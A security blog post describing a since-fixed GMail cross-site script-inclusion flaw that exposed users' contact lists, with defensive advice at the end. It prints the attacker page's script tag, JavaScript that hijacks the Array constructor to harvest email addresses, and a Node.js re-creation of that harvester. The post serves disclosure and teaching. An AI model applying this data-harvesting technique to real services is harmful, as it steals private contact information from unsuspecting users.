
Advanced Web Attack Techniques using GMail

A few months ago, I discovered a vulnerability in GMail where it became trivial to compromise someone's email contact list. I demonstrated the issue to a friend at Google by emailing his GMail account a simple link. Upon clicking the link and viewing the page, no XSS required, his contacts were displayed on screen (see screenshot). From there the email addresses could easily be stolen. Imagine if a spammer stumbled across this!

The issue was fixed within a few days, but the reason this particular vulnerability was interesting is that the exploit technique is a bit different from what is normally discussed. Also, I've been seeing the scenario described below increasingly often in websites. Those interested in browser security and AJAX development should take note.


Attack Details
This assumes some knowledge of Cross-Site Request Forgery (CSRF); the attack is a slight variation on it. The forged request is a cross-domain script include rather than a form post, and the prize is the response body, not a state change.

1) Email the GMail user a link and get them to click it.
example: http://foo/index.html


2) HTML of http://foo/index.html
The single line of HTML below forces the web browser to automatically send a cross-domain HTTP request to GMail. If the victim is logged in (obviously the case for someone reading GMail), the browser attaches the session cookies to that request, and the response contains the contact list. The URL was predictable across all users, so the attacker needed nothing victim-specific to build it.

Page URL: http://foo/index.html

<script src="http://mail.google.com/mail/?_url_scrubbed_"></script>

3) Sample content of http://mail.google.com/mail/?_url_scrubbed

The JavaScript below is a bare array literal, not assigned to any variable, holding your contact list of email addresses.

[["ct","Your Name","foo@gmail.com"], ["ct","Another Name","bar@gmail.com"] ]

GMail normally fetches this data on the fly with an XmlHttpRequest (XHR), then eval()s the response text in the browser and assigns the result to a variable. In our case the literal is loaded into the JavaScript environment of http://foo/index.html through a script tag, so it is evaluated as a program but never assigned to anything we can read. An off-domain page cannot issue that XHR itself (the same-origin policy stops it reading the response), and the script include gives it the data only as an anonymous literal, so accessing the data requires something more.


4) Accessing the contact list

When the engine parses and interprets the bare array literal, the Array constructor is called. In the browsers of the day the global Array could be replaced with a user-defined function, and the engine called that replacement for every array literal, so it's possible to overwrite it with our own constructor to get at the contact list. The new Array constructor installs a setter on each array index so that it is invoked as every element is assigned, parses out the data we want, and prints it to the screen. Two caveats for anyone trying this today: current engines build array literals without consulting a user-defined Array, and the `setter =` syntax below is legacy SpiderMonkey syntax (Object.defineProperty is the modern equivalent), so the code no longer works as written. The response shape, however, is still the thing to watch for.

// Table that will receive the harvested addresses.
var table = document.createElement('table');
table.id = 'content';
table.cellPadding = 3;
table.cellSpacing = 1;
table.border = 0;

// Replace the global Array constructor. The engine of the day called it for
// every array literal and then assigned each element by index, so a setter
// on the next index sees every element as it is added.
function Array() {
    var obj = this;
    var ind = 0;
    var getNext;
    getNext = function(x) {
        // Re-arm: put the same setter on the following index so the next
        // element assignment lands here too. (`prop setter = f` is the legacy
        // SpiderMonkey syntax of the time.)
        obj[ind++] setter = getNext;

        if(x) {
            var str = x.toString();
            // Skip the "ct" tag and nested arrays; keep strings containing "@".
            if ((str != 'ct') && (typeof x != 'object') && (str.match(/@/))) {
                var row = table.insertRow(-1);
                var td = row.insertCell(-1);
                td.innerHTML = str;
            }
        }
    };
    // Arm index 0 before the engine assigns the first element.
    this[ind++] setter = getNext;
}

// Called once the GMail script has been included (e.g. from the page's onload
// handler); shows the harvested addresses to the viewer.
function readGMail() {
    document.body.appendChild(table);
}
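The harvesting technique from step 4, rebuilt as an added example that is not part of the original post. Modern engines no longer call a user-defined Array when they evaluate an array literal, and `obj[i] setter = f` is the legacy SpiderMonkey syntax of the day, so the engine's side is simulated here: buildLiteral() constructs each array through the supplied constructor and assigns the elements by index, which is the behaviour the hijack relied on, and Object.defineProperty stands in for the setter syntax. The sample response is constructed, and the names makeHijackedArray, buildLiteral, harvestContacts and renderTable are my own.

```javascript
// Added example (not the original post's code): the Array-constructor hijack
// for Node.js. buildLiteral() simulates the old engine behaviour the attack
// relied on (array literal -> call to the global Array constructor, then
// index-by-index assignment); Object.defineProperty replaces the legacy
// `obj[i] setter = f` syntax. Names and sample data are assumptions.

// Constructed sample response, shaped like the post's step-3 content.
const VULNERABLE_RESPONSE =
  '[["ct","Your Name","foo@gmail.com"], ["ct","Another Name","bar@gmail.com"]]';

// Attacker's Array replacement. Every index gets a setter; when the engine
// assigns element i, the setter records it, installs a setter on index i+1,
// and never stores the value, exactly like the post's getNext().
function makeHijackedArray(sink) {
  return function HijackedArray() {
    const obj = this;
    let ind = 0;
    function getNext(x) {
      Object.defineProperty(obj, ind++, { set: getNext, configurable: true });
      if (x) {
        const str = String(x);
        // Skip the "ct" tag and nested arrays; keep strings with an "@".
        if (str !== 'ct' && typeof x !== 'object' && /@/.test(str)) {
          sink.push(str);
        }
      }
    }
    Object.defineProperty(obj, ind++, { set: getNext, configurable: true });
  };
}

// Simulated literal evaluation: create each array via Ctor and assign the
// members by index so the accessor properties fire. The real arrays that
// JSON.parse produces serve only as the "source text" of the literal.
function buildLiteral(value, Ctor) {
  if (!Array.isArray(value)) return value;
  const arr = new Ctor();
  value.forEach((el, i) => { arr[i] = buildLiteral(el, Ctor); });
  return arr;
}

// What the attacker's page does: install the hijacked constructor, then
// "include" the victim's response. Returns the harvested addresses.
function harvestContacts(responseBody) {
  const stolen = [];
  buildLiteral(JSON.parse(responseBody), makeHijackedArray(stolen));
  return stolen;
}

// Equivalent of the post's readGMail(): render the haul as an HTML table.
function renderTable(addresses) {
  const rows = addresses.map(a => `<tr><td>${a}</td></tr>`).join('');
  return `<table id="content">${rows}</table>`;
}

console.log(harvestContacts(VULNERABLE_RESPONSE));
```

The inner arrays are built first, so their string elements hit the setter and the addresses are captured; by the time the outer array receives each inner array the `typeof x !== 'object'` test drops it, which is why the original filter works without any knowledge of nesting depth.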


Moral of the Story

* Don't serve sensitive data as a bare JavaScript file. A bare array literal is a complete, valid program, so a cross-domain script tag can execute it. Wrap HTML tags around the data, or otherwise prefix it with something that is a syntax error when loaded as a script, and have your own XHR client strip the wrapper before parsing.
* If JavaScript files must contain sensitive information, make the URL unpredictable (a per-user secret token an off-domain page cannot guess). And/Or...
* Make sure the file cannot be fetched by a request with an off-domain referer. Referer on its own is a weak signal (browsers and proxies may omit it), so prefer requiring something a script tag request cannot supply, such as a custom request header set by your XHR code, or a POST carrying a CSRF token.
All rights reserved © 2009 BesutOrganization